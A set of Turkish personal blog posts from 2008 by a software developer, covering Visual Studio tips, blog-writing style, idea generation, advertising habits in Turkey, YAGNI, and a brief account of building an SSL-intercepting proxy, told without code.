Ek olarak MbUnit v3 yenilikleri, MbUnit ve VS.NET ve VS.NET' te test projelerini nasıl belirtebilirsiniz yazılarını okumanızı şiddetle tavsiye ederim. Şu an ben bunu kullanır hale geldi ve TestDriven.NET ya da ReSharper olmadan VS.NET içerisinde testleri çalıştırmak çok keyifli.

VS.NET 2008 Hızlı Kod Yazma Eklentileri

Bu konuda iki tane çok popüler eklenti var :

CodeRush + Refactor! Pro ( VB.NET için ücretsiz versiyonu da var)
ReSharper (C# için ücretsiz versiyonu da var – bunun linkini bulamadım ama eminim böyle bir şey var!)

Maalesef bu iki eklentinin de tam verisyonu ücretli ve biraz da pahalı ama verdikler hız etkisini düşününce muhtemelen iki ay içerisinde paranızı geri almış olacaksınız. İkisi arasında benim tercihim CodeRush.

Bazı diğer eklentiler.

Şekil Yapma

Güzel bir programalama fontu seçin (Benim favorim Consolas)
Kodlama panelindeki renklendirmeyi düzenleyin (Ben klasik renkleri çok az değiştirerek kullanıyorum, arkaplanı ise genel açık-gri seçiyorum)

VS.NET İpuçları

Bir sürü ipucu sitesi ve kaynağı var ama Sara Ford' un websitesi sanırım bu sitelerin içerisindeki en iyilerden biri. Şu an itibari ile 372 ipucu var, bazıları "File altında Open diye bir menü var, biliyor muydunuz?" derecesinde salakken bazıları gerçekten de çok güzel. Takibe ve arşivlerini analiz okumaya değer.

Visual Studio sandığınızdan çok daha güçlü, güzel ve gelişmiş şekilde. Son olarak ben de zamanında VS.NET' e küçük bir eklenti yazmıştım, The Guardian (download). VS.NET 2008 ile çalışığ çalışmadığını bile bilmiyorum ama ilginizi çekebilir. Süper dağınık bir yazının sonuna geldik, umarım siz parçaları birleştirebilir ve bu yazıdan işinize yarayan bir şeyler çıkartabilirsiniz.

Kurban Bayramınız Mübarek Olsun

Ferruh Mavituna — Paz, 07 Ara 2008 12:42:38 +0300

Hepimizin bayramı mübarek olsun.

Ben de bayram boyunca kendime tatil aldım. Buralarda Kraliçe' den başka el öpmesine gideceğimiz kimse olmadığı için yatıyor, yazılım geliştiriyor, oyun oynuyor ve blog yazıyor olacağım.

Blog Yazılarının Formatı

Ferruh Mavituna — Cum, 05 Ara 2008 18:24:12 +0300

Ben bu konuda süper bir örnek değilim ve benim de yapmadığım, yapamadığım bir çok şey var ama blog yazarken yazının formatı hakkında şunlara dikkat etmekte fayda olduğunu düşünüyorum.

Bunların bazıları mesela "paragraf kullanmak" bence ölümcülken bazıları "çok fazla smiley kullanmamak" sadece kişisel tercih. Liste büyüdükçe yazı formatı harici bir kaç konuyu da eklemiş bulundum.

Paragraf Kullanın, bol bol kullanın okunabilirliği inanılmaz derecede arttırıyor,
Çok küçük fontlar kullanmayın,
Okunaksız renk kombinasyonları kullanmayın, beyaz arka plan üzerine siyah yazı gibi temiz ve herkes tarafından sevilebilecek kombinasyonlar kullanabilirsiniz,
Linklerinizin link olduğu belli olsun, rengi değişik olsun ve mümkünse altı da çizgili olsun,
Uzun alıntılarda italik kullanmayın, onun yerine CSS ile bu yazının alıntı olduğunu belirtin. İtalik olarakta okunaklı olan yazılar hariç.
Cümlenin sonunda "nokta" koyun ve noktadan sonra da "boşluk" bırakın,
Madde olarak listelenecek şeyleri HTML listeleri ile destekleyin,
Anlamsal sayıları yazı, matematiksel veya hesapsal sonuç içeren sayıları ise rakam ile yazın,
"Buraya Tıklayınız" tarzı linkler vermeyin, anlamı içeren yazı parçasına link koyun,
"Hocus Pocus Yazılımı için buraya tıklayınız " yerine "Hocus Pocus uygulamaları hızlıca gizlemenize yarayan küçük bir uygulamadır." gibi.
Aynı linki aynı yazıda birden fazla defa vermeyin, Aynı şekilde diğer aynı linkleri de iki defa tekrar etmeyin,
Eğer kullandığınız terim çok az bilinen bir terim değilse bu terimi Wikipedia' ya veya benzeri bilgi merkezlerine linklemeyin. Bir web tasarım blogunda CSS terimini Wikipedia' ya linklemenin hiç bir anlamı yok. Gördüğünüz gibi Google ya da Wikipedia gibi yerlerden bahsederken de link atmanın pek bir anlamı yok,
Eğer teknik terimleri Türkçeye çevirecekseniz ingilizcesini de belirtin,
Çok uzun parantez açıklamaları yerine dipnotlar oluşturun, yazıyı okuyan kişinin dikkatini dağıtmayın,
Kalın, İtalik gibi yazı tiplerini yazının içeriğine göre kullanın, bu sayede yazıyı daha takip edilebilir kılacaksınız,
Paragraflar arasında boşlukları çok bırakın yeni satır ile paragraf arasındaki farkı anlayın,
Yazının genişliğini 600px' den çok tutmamaya çalışın bundan sonra yazıyı takip etmek zorlaşabiliyor (tamamen kşisel görüşüm, genelde insanlar bu konuda ikiye ayrılıyor)
Türkçede ayrı yazılan de, da gibi tırı-vırı ama insanların takıntılı olduğu konulara dikkat edin, sonuçta okuyucuların yazıyı anlamasını istiyorsunuz, yazıyı okurken ufak şeylere takılmalarını değil,
Türkçe yazı editöründen geçirin,
Argo kelimelerden, MSN Türkçesinden uzak durmaya çalışın,
Argo kelimelerde bence pek bir sorun yok ama "hadi yaw, kanka" gibi bir şey okumak pek keyifli değil. Tabii ki bazen yazı stili bunu gerektirebiliyor, o durumları saymıyorum.
Yazılara resim koyun,
Açıkçası yazılara alakasız sadece resim koymak için resim koymayı ben kendime yediremiyorum, yani boyama kitabı ya da üçüncü kalite bir yapımı pazarlarmışcasına. Ancak aynı fiyat etiketlerini 0.99 YTL yapmak gibi bu da çalışan salak taktiklerden biri. Bunun harici eğer konuya yardımcı olabilecek resim veya video varsa kesinlikle blog yazısına ekleyin, yazıyı aşırı derecede canlandırıyor.
Yazılara etiket (tag) eklerken çok etiket eklemeye değil çok yazıya aynı etiketleri eklemeye çalışın, eğer etiketler gruplanamıyorsa etiketlemenin bir anlamı kalmıyor değil mi?
Yazılarda çok fazla "smiley (sırıtan küçük salak ikonlar, lolcatz' in yazı içerisinde hayat bulmuş hali diye de bilinir)" kullanmayın, hatta hiç kullanmayın.
(!) işareti cümlenin sonunda o cümlenin sarkastik bir şekilde söylendiğini belirtir, bunu bilerek kullanın,

Son olarak bütün bunların kendi tarzınızın, ya da yazma isteğinizin önüne geçmesine izin vermeyin ve unutmayın ki "içerik hala tahtta" *

Bu liste genelde diğer blog yazan kişileri okurken beni rahatsız eden konuları içeriyor, siz bu blogu okurken nelerden rahatsız oluyorsunuz? ya da bu listede olmayan ama başka blogların yaptığı ve sizi rahatsız eden şeyler neler?

Fikir Üretme, Etki ve Tepki

Ferruh Mavituna — Çar, 03 Ara 2008 20:58:16 +0300

Hiç dikkatinizi çekti mi bilmiyorum ama bir bakıyorsunuz altı tane aynı dönem şairi çok yakın arkadaşlar, çünkü hepsi aynı mahallede büyümüşler ya da bir dizi oyuncunun hepsi çocukluk arkadaşı ve hepsi de çok ünlü ve benzer projelerde çalışıyorlar. Mesela Türkiye de bir dönem çok popüler olan muhasabe yazılım firmalarının en büyük ikisinin sahibi üniversitede aynı sınıfta olmaları ya da bugünün internet ve bilgisayar dünmyasının bu hale gelmesinde MIT' nin büyük rolü ve o günün MIT' sindeki simaların bugün bu sektörde çok büyük imzalarının bulunması gibi. Örnekleri çoğaltabiliriz popüler IDS' lerin geliştiricilerinin oda arkadaşı olması gibi. [1]

Benim eski ve uçuk teorilerimden biri insanların etrafındaki kişilerin beyin dalgalarından etkilenip istem dışı olarak bilgi çalmaları ve aynı noktaya ulaşmalarıdır. A Scanner Darkly' de bir yatak muhabbetinde de bu felsefenin kırıntıları görülebilir. Yani bir nevi beyninizin diğer insanların beyin dalgalarını çalıp bilinçaltında kullanması. Tabii ki yıllardan sonra bu teorimi daha oturaklı bir hale getirdim ve şuna çevirdim:

İnsanlar çok gelişmiş makineler, lakin girdi olmadan çıktı üretemezler. Mesela henüz ergenliğe erişmemiş bir çocuğa cinsel ilişkiyi anlatamazsınız [5], o çocuk henüz o bilgiyi idrak edecek bir girdiye, içgüdüye sahip değildir. Rasgelelik konusuna hakim olanlar buradaki noktayı daha çabuk kavrayabilirler. Rasgele bir sayı üretmek için genelde bir "seed" kullanırsınız, yani rasgeleliğin temelini oluşturacak girdi. Bilgisayarlar tamamen tahmin edilebilir olduklarından bilgisayarın kendisi aslında hiç bir zaman rasgele bir şey üretemez, bu yüzden gerçek rasgelelik (TRNG) çok daha komplike bir sistem gerektirir mesela "evren" gibi, "dünya" gibi, bu tip planını yapamadığımız, bir sonraki adımını tahmin edemediğimiz sistemler bizim için rasgele olan girdiler sağlayabilirler. Bu yüzden bazı sistemler rasgelelik sağlayabilmek için dış dünya datalarını kullanırlar, sıcaklık, nem, ses, hareket, ışık vs.

Şimdi demek ki insan girdi olmadan çıktı üretemiyor, hayalgücünün belli limitleri ve şekillendiricileri var, demek ki gerçekte rasgelelik yok ama bir dizi etken ve sonuçlar var. Teoride buna dayanıyor. Eğer insanlar aynı kaynaklardan besleniyorsa ürettikleri şeyler ve ulaştıkları noktalar da benzer olacaktır. Yani aynı web sitelerinden, aynı bloglardan, aynı televizyon dizilerinden, aynı filmlerden, aynı müziklerden ve bazen aynı coğrafyadan, hatta aynı öğretemenlerden, aynı kitaplardan beslenen topluluğa dahil olan kişiler aynı ve benzer üretimler yapacaktır. Eğer yarın bir gün bir sosyal platform çıkar ve bu kaynakları tek bir yerde toplar ardından da aynı kaynaklardan beslenen kişileri eşleştirirse bu kişilerin benzer çıktılar ürettiğini gösterecektir.

Özellikle yakın dönem trendlerini tahmin etme ve bir sonraki adımı görme de bunun sonuçlarından biridir. Ancak buradaki kişi çok sevinmemeli çünkü sektörün bir sonraki adımını tahmin edebilmiş olsa da onunla aynı havuzdan beslenen diğer kişilerde bu bir sonraki adımı tahmin edebilecektir. İşte o noktada "Fikir x Harekete Geçirme x Hız" formülü sonucun değerini belirleyecektir. Fikir' i bu formülden çıkartırsanız gerçekten önemli olanın eyleme geçirme kalitesi ve bunu ne kadar hızlı yapabildiğiniz olduğunu göreceksiniz [2].

Aynı nedenlerden dolayı tarihe icatlar ile ya da yeni yaklaşımlar ile geçmiş bir çok kişi toplum tarafından "kopuk", "manyak", "deli", "sorunlu" olarak nitelendirilmiştir, ya da okuldan atılmıştır. Ressam, müzisyen ve benzeri sanatçılar olduğu kadarıyla teknik kişiler de bir istisna değildir. Ek olarak bazı bilim adamlarının büyük bir buluşa ulaşmalarını sağlayan neden onların "genel olarak kabul gören" bir şeyi kabul etmemiş olmalalarıdır. Bu da aynı "Balığa suyu anlatmak gibidir", Ne zaman balık kendini sudan bağımsız sayabilir o dakikada suyun ne olduğunu anlayabilir, aksi takdirde su onun için dogma bir bilgidir, bunu tekrar tanımlamak ve anlatmak mümkün olmayabilir.

Ana konuya dönersek iki tip girdi olduğunu görebiliriz:

Genel Girdi
Bu klasik genel kültür girdisidir, bunun sayesinde kahvede iyi bir konuşmacı olabilir ve hatta bir sonraki haftaki memleket gündemini bile çözebilirsiniz. Ek olarak bu tip girdi toplumların kanalize edilmesindeki en mükemmel yoldur, çünkü bilinçli ya da bilinçsiz (hem yayıncı hem izleyici tarafında) belli etkiler oluşur ve sonuçlar benzer çıktılara yol açar. On sene önce yayınlanan bir televizyon serisi on sene sonraki ülkenin belli yaşındaki insanları üzerinde etki yapıp, belli akımlara yol açabilir. [6]

Alternatif Girdi
Eğer "Genel Girdi" yi popüler kültür ve standart yaşam tarzı noktasına indirgersek "Alternatif Girdi" yi de normal şartlarda bulunduğun coğrafya, etnik kültürde pek bilinmeyen ve beklenmeyen bilgi ile beslenme olarak tanımlayabiliriz. Mesela İstanbul - Bostancı' daki bir adamın Afrika Etnik müziği dinlemesi tam anlamıyla o kişi için alternatif bir girdidir. Dolayısıyla bu kişinin her adımdaki çıktısını etkileyecektir. [7]

Aynı dalgadan girdiye maruz kalan insanlar istem dışı aynı şeyleri üretecektir. Mesela ben XSS Shell' i yayınladığım hafta Attack API ve BeeF te yayınlandı. 2005' te bu konunun ilk örneği geliştirilmesine rağmen tam iki sene sonra, üç farklı kişi aynı konsepti daha farklı bir şekilde birbirlerinden haberdar olmadan tekrar yaptı[3]. İlk bakışta bu her ne kadar tuhaf görünse de bu kişilerin hepsinin benzer arka plana sahip oldukları (yazılım geliştiriciliği, güvenlik ve web uygulaması güvenliği odağı), aynı blogları takip ettiği, son zamanlardaki aynı makaleleri okudukları düşünülünce, sonuç biraz kaçınılmaz oluyor. [8] Sonuçların ikisi çok yakınken diğeri biraz farklıydı. Bunun da ana nedenini, o kişinin alternatif girdilerine bağlıyorum. Onun ürettiği yazılım tamamen JavaScript ağırlıklı idi ve kendiside diğer iki kişiye göre JavaScript ile çok daha yoğun şekilde uğraşıyordu.

Son zamanlarda okuduğum Paul Graham' ın Cities and Ambition yazısı[4] tüm bu anlattıklarıma başka bir açıdan yaklaşıyor. O da yaşadığı şehrin insana verdiği mesajdan ve insanın o mesajdan etkilenip hayat tarzını ona göre şekillendirmesinden bahsediyor ki bu da burada bahsettiğim girdi ve çıktı fikrini destekliyor.

Tüm bunlar sizin günlük hayatınızda bir anlam ifade ediyor mu? Anlam ifade ettiği tek şey nasıl bir "girdi" [9] istediğinizi tanımlamak olabilir. Bunun sonucunda da çalıştığınız iş yerini, okuduğunuz siteleri, kitapları, kaynakları, ilgilendiğiniz hobileri, gördüğünüz yerleri, yaşadığınız şehri, yaşadığınız odayı, yaşağıdınız ülkeyi değiştirmek, çeşitlendirmek olabilir.

[1] Bunların hepsini kişi ve örnekleri isimler ile detaylı vermek isterdim ama maalesef hiç biri detayları ile aklımda kalmadı, eğer benzer kesin ve güzel örnekler biliyorsunuz yorum olarak belirtebilirsiniz.
[2] Bundan sonra tabii ki bu işi pazarlama gibi noktlar var, onlara değinmiyorum
[3] Burada kimsenin birbirinden duyarak yapması mümkün değildi çünkü projenin geliştirilme aşaması bir haftadan kısa olamaz, dolayısıyla bu üç kişinin de bunu tamamen birbirlerinden bağımsız yaptıklarını söyleyebiliriz. Daha da uç bir örnek vermek gerekirse, 5-6 sene kadar önce bir web projesini henüz açmadan, aynı fikri, neredeyse aynı arabirim ile ve hatta aynı renkler ve aynı arkaplan ile (benim soldan sağa iken onunki sağdan solaydı) başka birisi benim yayın tarihimden bir hafta kadar önce açtı. Eminim sizin de bizzat tanık olduğunuz benzer örnekler vardır.
[4] Bu Paul Graham' ın diğer yazıları gibi harika bir yazı, İstanbul tam olarak ne mesaj gönderiyor, henüz ben çözemedim. Ama sanırım gönderdiği mesajlardan biri "Hayatta Kal!" .
[5] İmam-ı Gazali' nin enfes metaforlarından biri, maalesef orijinal kullanım konusu aklımda değil
[6] Sanıyorum ki açmıştır da, ama o gözlemi yapmak beni aşan konulardan biri, belki yirmi sene sonra gene bu konuda blog yazarsam, tekrar bu gözlemi yapabilirim!'
[7] Bu noktada Kelebek Etkisini unutmamak lazım, ama aynı şekilde bir zarı 1000 defa atarsanız tüm zarların ortalaması 3 olacağı gibi genel çıktılar belli ortak paydalarda buluşacaktır
[8] Burada muhtemelen çok daha fazla kişi aynı arka plana ve girdiye sahipti ancak, bir çok farklı etkenden dolayı tahmin ediyorum ki bir çok kişi bu projeyi hiç bir zaman hayata geçirmedi.
[9] Bu "girdi" kelimesi çok fena yanlış anlaşılmalara neden oluyor!

Reklam Korkusu

Ferruh Mavituna — Sal, 02 Ara 2008 23:17:01 +0300

Nedense bizde genel olarak bir reklam yapma korkusu var. Mesela üzerinde markanın büyük harflerle yazdığı kıyafetleri "Ben bedavaya adamın reklamını mı yapacağım?" diye giymeyen insanlar var. Sanki bizim arka mahallenin sidikli Murat' ı değil de David Beckham arkadaş. Bu o kadar büyük bir mevzu değil ama bu işin özü.

Olayın değişik çıktılarını farklı yerlerde görebiliyoruz;

Türk dizilerinde, filmlerinde markaların hepsi sansürlüdür, firma adları, ürün isimleri söylenmez,*
Microsoft Zirvelerinde konuşmacılar Linux değil, Linux ve türevlerini kastederken "Diğer İşletim Sistemleri" derler,
Firmalar resmi olmayan yerlerde diğer benzer ürün ve firmalardan bahsederken "rakiplerimiz", ya da "benzer ürünler" derler, rakip bariz ve tek olsa bile isim kullanılmaz, Öyle ya reklamın iyisi kötüsü yoktur,
Microsoft' un yabancı evangelistleri hatta direk o ürünler üzerinde çalışanlar bile ürünlerini benzerlere göre zayıflıklarını açık açık söylerken,Türkiye' dekiler bu tip şeyleri asla kabul etmez ve rakip firma, ürün ismi kullanmaz. Microsoft örneğini ikinci defa veriyorum çünkü çok tanık oldum ve MS' in diğer ülkelerdeki yaklaşımı ile Türkiye' deki yaklaşımı bireyler açısından çok değişik, dolayısıyla farkı görmek çok basit.
Çok fazla Türk roman okumuyorum, pek atmış olmayayım ama gördüğüm kadarıyla romanlarda da marka, ürün vs. isimleri geçmez.

Mesela Stephen King' te görürsünüz ki karakterler Seven Eleven' da Coca Cola içerler, bilmem ne markası ile ellerini yıkarlar. Ya da Big bang Theory de Penny Age of Conan oynar, her üç dizinin ikisinde karakterler XBox onar. Bizde ise Wii ürününü göstermemek için üç takla atılır, hele ismi ise kesinlikle zikredilmemelidir.

Her zamanki bu sonuçsuz daha çok neden böyle sorusunu akla getiren bir yazı. Henüz ben bunun neden böyle olduğunu psiko-analiz edemedim, edenler vardır. Herkesin "Türkler ..." diye başlayan şeylerden sıkıldığını biliyorum ama bence çok önemli bir konu çünkü bu tip şeyler toplum olarak nerelerde doğru nerelerde yanlış yaptığımızı ortaya koyacak şeyler. Global bir dünyadayız sosyal hoppalık hepimizi dünya ile burun buruna getirdi, farklılıkları görmek çok daha kolay. Başkalarının ne sorunları nasıl çözdüğünü, neyi yanlış yaptığını, ne tip bir tarihin onları nasıl iyi veya kötü etkilediğini görmemiz çok daha kolay. Bunların sonucunda rakı masasında ülkeyi kurtaracak halimiz yok ama her zaman kendimiz kurtarabilir ve dalgaya kapılmadan kendi yolumuzu çizebiliriz.

Son olarak bloglar gibi organik ve kurumsal olmayan yapılar her ne kadar bunu takmasa da orada da başka bloglardan bahsetme korkusu zaman zaman başgösterir, mesela yazıya link verilmez "alıntı" yapılır, bu "alıntı" lar o kadar büyükdür ki adeta yazıyı almış gitmişsin gibi olur. Gene de sanırım internetin doğal samimi yapısı bu olayı çok ciddi şekilde kırıyor ve çok değil yakında kurumsal anlamda da bu yapıların başka coğrafyalarda kırıldığı gibi bizde de kırılacağına eminim.

* Türk dizi, film vs. lerde gizli reklam yasasından dolayı bunların bir çoğu mümkün olmuyor olabilir, ama yegane örnek bu değil ve sanırım genel kanıyı değiştirmiyor, ek olarak eminim ki bununda kanuni olarak üzerinden gelmenin bir yolu vardır. Bu konuda daha bilgili olan birinde işin o kısmının detaylarını duyabilirsek güzel olur.

Obsesif Programcılık

Ferruh Mavituna — Paz, 30 Kas 2008 12:44:09 +0300

Programcılık kısa zamanda takıntıya dönüşen işlerden biri sanırım. Sitenin düzenli takipçileri farketmişlerdir bu aralar pek bir şey yazamadım. Genel mevzular dışında yoğun şekilde programlama yapıyorum. Son üç günüm tam anlamıyla feciydi. .NET ile SSL trafiğinede müdahaleyi sağlayacak bir proxy server yazmak ile uğraşıyorum. Aslında daha önceden XSS Tunnel için bir proxy yazmıştım ancak o proxy SSL, keep-alive desteklemiyor ve daima tek bir server ile HTTP objeleri üzerinden konuşuyordu.

Dolayısıyla TCP ile sadece tarayıcıdan proxy' ye gelen istekleri işliyordum, diğer taraf gene .NET' in HTTPWebRequest objelerini kullanıyordu. Gelen cevabı da değiştirip tarayıcıya geri gönderiyordum.

Bu yeni sistemde ise tam bir proxy implemantasyonu yapıyorum. Yaptığım iş tam olarak MITM – Attacking / Debugging proxylerin yaptığı işin aynısı. Bunun da bir çok gereksinimi var. SSL' e MITM yapmanız gerekiyor, HTTP Protokolünü kendiniz implemente etminiz gerekiyor. Son üç-dört gündür vaktimi harcadığım konular:

.NET' te TCPClient ile SSL bağlantısını self-signed bir sertifika ile kabul etme
TCPClient ile Chunked encoding' i destekleme
HTTP/HTTPS implementasyonu
Gzip, Deflate' i anlama, decode edebilme

Bazıları uzun, bazıları kısa sürdü ama bazı noktalarda ciddi derecede bunalıma girdim. Eğer 3 saat süreceğini planladığınız bir iş 2 gün sürüyorsa moraliniz bozuluyor ve bazen öyle bir noktaya geliyorsunuz ki "Acaba sonuçlar buna değecek mi?" ya da "Hiç bir zaman çalışmayacak mı?" gibi soruları kendinize sormaya başlıyorsunuz.

Ama Allaha şükür dört günün sonunda bir dizi hata ayıkladıktan sonra, tuhaf sorunlar ile karşılaştıktan sonra, HTTP RFC' lerini daha detaylı okuduktan sonra sistem çalışmaya başladı. Kodu deneysel aşamadan kurtarıp adam akıllı bir hale sokmak ve çeşitli şekillerde test etmek, performansı artırmak biraz daha vakit alacak ama bundan sonrası basit.

Bu arada programcılıkta akıcı noktayı yakalamak ile ilgili bu grafik çok hoşuma gitti. Neyse bu kadar işten sonra ödülü hakettim değil mi?

Yazar Call of Duty 5 Multiplayer' ı açar ve "Capture the flag" çığlıkları arasında çeşitli Yankee ve Japon askerlerini öldürür....

Bilgi ve YAGNI

Ferruh Mavituna — Cum, 28 Kas 2008 01:05:48 +0300

YAGNI - You Ain't Gonna Need It, yazılım çevrelerinde kabul gören ve benim de şiddetle izlemeye çalıştığım prensiplerden biridir. Basit şekilde "bir şeye ihtiyacın yoksa yapma, ne zaman ihtiyacın olur o zaman yaparsın" diye özetlenebilir.

Bugün aklıma şu soru geldi: Bu prensibi bilgiye de uygulayabilir miyiz? Mesela "İspanyolca öğrenmeye henüz ihtiyacım yok, niye gidip İspanyolca öğreneyim ki?" Ya da "Ruby on Rails" seksi duruyor ama henüz benim bir işime yaramıyor gibi. Bu konu hafiften Genel Kültür Çağımızın En Büyük Yalanıdır konusu ile de ilişkili, henüz ben bir karara varamadım, karara varıp varmamak pratik yaşantıda ne kadar şeyi etkileyecek emin değilim ama ilginç sonuçlar getirebilir.

SSL İmplementasyon Güvenliği

Ferruh Mavituna — Cum, 07 Kas 2008 11:37:51 +0300

SSL İmplementasyon Güvenliği dokümanımı Web Güvenliği Topluluğu (WGT) altında yayınladım. Dokümanı daha önce ingilizce olarak SSL Implementation Security FAQ adı ile yayınlamıştım, Türkçe versiyonu biraz daha fazla bilgi içeriyor. Çevirirken tekrar üzerinden geçme fırsatım oldu. Eğer yazılım ve web uygulaması geliştiriyorsanız kesinlikle bir göz atın.

Yorgunum Dostlar

Ferruh Mavituna — Cum, 07 Kas 2008 11:26:40 +0300

Artık neden blog yazmadım, 15-20 gündür neden gözükmüyorum vs. gibi konuları yazmıyorum bile. Çünkü ben sıkıldım, sizin ne kadar sıkıldığını tahmin bile edemiyorum.

Herneyse şimdi hızlı şekilde neler oldu, neler bitti?

Sistemi yeniledim, yeni bir harddisk, yeni bir işlemci, yeni bir grafik kartı aldım,
Hazır o kadar şey yapmışken Vista x64' e de geçtim,
10 senedir beklediğim Fallout 3 çıktı (bunun hakkında daha sonra detaylı yazacağım inşallah)
Yılbaşı nedeniyle onlarca süper oyun piyasaya çıkıyor ve çıktı onlarla vakit harcıyorum, şu aralar oynadığım oyunlar:

Mass Effect
Fallout 3
Call of Duty 5 : World at War (Multiplayer Beta)
Soul Calibur IV

Arada bir baktıklarım da:

King's Bounty
Mirror's Edge

Genel olarak sağlığım iyi olsa da inanılmaz bir halsizlik hali içerisindeyim, kansızlığım azdı herhalde,
İş yoğunluğum normalin üzerinde, bu dönem çok yoğunuz dolayısıyla pek kendime vakit ayıramıyorum,
Sitenin SSL' i nin yenileme tarihi geçti, bu da blog ekranlarının SSL desteğinde sorun çıkardı, vs. vs.

Bunların içerisinde sizi ilgilendiren bir şey var mı? Muhtemelen yok.

Bütün bu dönemde ben gene aktif paylaşıma FriendFeed, Twitter ve RSS Paylaşımından devam ediyordum. Dolayısıyla blog' ta yeni yazı yokken canınız sıkılırsa buraları takip edebilirsiniz.

Büyük Resmi Görebilmek

Ferruh Mavituna — Cum, 17 Eki 2008 22:46:42 +0300

Tatilim bitti, tekrar beyaz ekranlara döndüm ***. Uzun süredir kafamda dönen, herkesin bildiği lakin göze tekrar sokulmayı hakeden bir konuda yazmak istiyorum.

Büyük resmi görmek detaylardan kopup gerçek olayı görmek, getiriyi ve götürüyü analiz edebilmektir. Bu hayatın her yerinde karşı karşıya olduğumuz bir durumdur, elimizdekine odaklanıp gerçek amacı unutmak, bir projenin bir bölgesine yoğunlaşıp uzun vadede hataya dönüşen bir karar vermek, günü kurtarmak için 5-10 dakikadan kar edip işin sonunda günler kaybetmek ile alakalıdır.

Hatta genel olarak gizli servislerin ve devletlerin suni gündem yapması da bizim büyük resmi görmemizi engellemek içindir. Bu suni ya da gerçek ekonomik sıkıntı, savaş, magazin değerli bir haber ya da tamamen gerçek dışı bir olay olabilir. Bunlar sayesinde odağın kayması ve gerçekte, büyük çapta olan olayın farkedilmemesi sağlanır.

Büyük resmi görmeye bir kaç örnek;

Toplu Taşıma Sorunlarını Çözmek:

Bir metropolde toplu taşımanın geliştirilmesi ciddi maliyetlere çıkacaktır, ancak toplu taşımayı çözmenin tek amacı sadece insanların daha mutlu olmasını sağlamak için değildir, bunun getireceği güzellikler arasında şunlar da vardır :

Toplu taşımada kaybedilen insan gücünün ekonomiye geri dönmesi,
Toplu taşımanın kötülüğünden dolayı artan kişisel araç kullanımının artması
- Bu hava kirliliği,
- Daha fazla benzin harcanması (paranın yurtdışına çıkması) ve
- Daha fazla kişisel aracın satılması (paranın yurtdışına çıkması) anlamına geliyor.
vs. vs.

Dolayıysıyla toplu taşımayı çözmenin kendini ne kadar sürede amorti edeceği hesaba katılmalıdır, bu sadece insanlar dah fazla oy versin diye yapılması gereken bir şey değil.

Çalışanların öğle yemeği vakti:

Yapılan araştırmalarda öğle yemeğine 30 dk. yerine 60 dk. ayıran firmalar çalışanlarından daha yüksek performans alıyorlarmış*. Burada büyük resmi gören firmalar 30 dk. kar etmeye değil bunun uzun ve orta vadedeki etkilerini görebiliyorlar. Benzer bir şekilde zamanında Hayalet Çalışan başlığı altında benzer bir konudan bahsetmiştim.

TDD, Test Driven Development :

TDD bir yazılım geliştirme metodolojisidir. TDD ile yazılım geliştirirken her yazılan kod için bir de test kodu yazılır, bu da tabii ki yazılan kod oranını ciddi şekilde yükseltiyor. TDD' nin özellikle Türkiye gibi sıkışık, aceleci, henüz tam oturmamış ülkelerde yerleşememesinin en büyük nedeni de gene büyük resmi görememektir. TDD konusunda yapılan bir çok araştırmada TDD' nin uzun vadede bakım, hata ayıklama ve benzeri proseslerden kazancından dolayı çok daha verimli olduğunu ortaya konulmuştur. Bugün bir çok firma ya TDD uyguluyor ya da sadece Unit Testing yapıyor. Dolayısıyla günlük yazılım geliştirme hızı düşse de sonuçta kazanç artıyor, bu noktada büyük resmi göremeyen yazılım firmaları da günü kurtarmaya devam ediyor **.

Maalesef hayatta da büyük resmi kaçırabiliyoruz, yegane amacı kaçıyoruz. Burada bir kaç nokta var,

Yaptığınız şeyleri yaparken kendinize “Neden?” sorusunu sorun,
Yeni bir karar verirken sadece kısa vadeyi değil ana nedeni düşünün,
Mesela üniversite sınavlarından sonra okul seçerken sadece iyi okul seçmeyi düşünmekle yetinmeyin “Neden Okuduğunuzu” u düşünün.
Her işinizi yaparken arada bir adım geri atın ve tüm olayı bir bütün olarak görmeye çalışın. Detaylarda kaybolmayın. Neden başladığınızı, şu an yaptığınızı neden yaptığınızı, bu yapılan ana sonuca yardımı olup olmayacağını değerlendirin.
Konunun içerisinde olmayan biriyi konuya çekip hızlı şekilde fikir alın.
Programcılıkta bir yerde saatlerce takılır ve sorunu çözemezseniz hemen etraftaki bir programcıyı bulur ve ona sorunu sorarsanız, sizin iki saattir çözemediğiniz olayı genelde o bir dakikada tespit eder. Çünkü bu sorun genelde ya yazım hatasıdır, ya yazdığınız kod ile baktığınız çıktının farklı olmasıdır. Dışarıdan gelen kişi sizin kadar işin içerisinde olmadığından varsayım yapmadan en aptalca olan şeyleri bile kontrol eder. Yani size “Sunucunun prizi takılı mı?”, “Baktığın tarayıcı cache’ in de mi tutuyor?”, “Çalıştırdığın yazılım eski verisyonu mu son olarak compil ettiğin mi?” diye sorabilir. Siz ise bunları o noktada düşünemeyebilirsiniz (Hatayla Yaşamak ve Sorun Çözmek).

Konu bundan çok daha geniş ama siz zaten konuyu biliyorsunuz, bu ise size bir hatırlatma. Şimdi bir adım geri atın ve düşünün.

* Makalenin kaynağı BA Business Life dergisi, ancak online olarak bulamadığımdan kaynağı veremiyorum.

** Bu konuda bir çok istisna var, her firma illa TDD kullanacak diye bir şey yok, her projeye uygun da olmayabilir, ama TDD başarısı kanıtlanmış metodolojilerden biri.

*** “yeşil sahalara dönme” kelime grubuna yapılan göndermedir bu, bu noktada okuyucunun suratında bir tebessüm oluşması gerekiyor.

Eğer Başka Bir İş Yapacak Olsaydınız

Ferruh Mavituna — Cum, 17 Eki 2008 22:19:46 +0300

Bu zaman zaman aklıma gelir, eğer şu an yaptığım şeyi yapmıyor olsaydım olsaydım ne yapardım?

Ben genelde istediğim şeyin peşinden giden insanlardan biriyimdir ama buna rağmen hayatın rüzgarını, gerçekçi planları ve elimdeki kaynakları kararlarıma da dahil ederim. Dolayısıyla bir konuda 10 sene harcadıktan sonra bam başka bir konuya atlayacağımı sanmıyorum.

Oyun Programcılığı
Oyun programcılığı içimde kalmış uktelerden biridir, hatta bundan 4,5 - 5 sene kadar önce oyun programcısı olarak bir firmada başlıyordum, sonra olmadı.

Lakin C++ taki deneyimsizliğim, çok güçlü bir matematik hatta fizik altyapımın olmaması ve deneyim kazanacak imkan olmaması yüzünden sanırım hiç bir zaman bu konuda uzmanlaşamadım.
Oyun Yazarlığı
